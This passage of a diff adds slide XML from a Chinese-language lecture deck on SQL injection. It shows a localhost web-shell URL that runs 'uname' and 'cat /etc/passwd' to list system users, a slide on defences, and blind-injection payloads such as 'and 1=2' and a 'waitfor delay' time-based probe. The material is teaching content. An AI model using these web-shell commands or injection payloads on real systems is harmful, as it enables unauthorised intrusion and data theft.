+              <a:t>http://localhost/admin/uploads/shell.php3?cmd=uname</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>将运行在操作系统的命令信息并返回当前的内核（</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Linux</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>）</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>cat /</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>etc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>passwd</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>来得</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>到系统的完整的用户</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>列表</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>uname</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> -a </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>获取当前的内核版本</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3218004721"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913774" y="41554"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>防御</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
+              <a:t>措施</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914399" y="1214651"/>
+            <a:ext cx="10363826" cy="5063320"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>1) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>在服务端正式处理之前对提交数据的合法性进行检查</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>；</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="1" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>在确认客户端的输入合法之前，服务端拒绝进行关键性的处理操作</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>(2) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>封装客户端提交信息；</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>(3) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>替换或删除敏感字符</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>字符串；</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>(4) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>屏蔽出错</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>信息；</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="1" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>屏蔽错误信息是在服务端处理完毕之后进行补救，攻击其实已经发生，只是企图阻止攻击者知道攻击的结果</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058395911"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>拓展实验</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>——</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>盲注</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>为什么叫盲注</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>与普通的注入不同的是，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>盲注是一种通过向数据库请求真或假的问题然后根据回应来决定或判断答案的一种</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入式攻击。例如发现了</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入点，但应用只提供了一个通用的错误页面，或者说提供了正常的页面，但与我们取回的内容只有细小差异（部分可能不可见或不易观察），这些就属于</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>盲注</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>。</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>盲注实质仍属于</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>注入，需要通过多次进行真假的询问来对内容进行逐字符的猜解</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2507909678"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>拓展实验</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>——SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>盲注</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913774" y="2071171"/>
+            <a:ext cx="10363826" cy="4241493"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>盲注分类</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>基于内容</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            </a:br>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>xxx.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>=2 and 1=2"</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>If the content of the page that returns 'true' is different than that of the page that returns 'false', then the attacker is able to distinguish when the executed query returns true or false.</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>基于时间</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            </a:br>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>xxx.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>=1' </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>waitfor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> delay '00:00:10'--" (Microsoft SQL Server)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>Mysql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>常搭配 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>sleep()</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>与</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>benchmark()</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            </a:br>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>通过服务器响应的时间可以判断出语句成功或失败</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2013653494"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>参考资料</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="2036586"/>
+            <a:ext cx="10363826" cy="3424107"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>1. [</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>pentesterlab</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>course]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>https</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>pentesterlab.com/exercises/from_sqli_to_shell/course</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>. [WIKIPEDIA SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>injection]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>https</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>en.wikipedia.org/wiki/SQL_injection</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>3. [</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>百度百科 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入攻击</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>baike.baidu.com/view/983303.htm</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>4. [</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>必应词典 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>sql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> injection</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>http://www.bing.com/knows/search?q=sql+injection&amp;mkt=zh-cn&amp;FORM=BKACAI</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>4. [</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>各种博客</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>]</a:t>
+            </a:r>
+          </a:p>
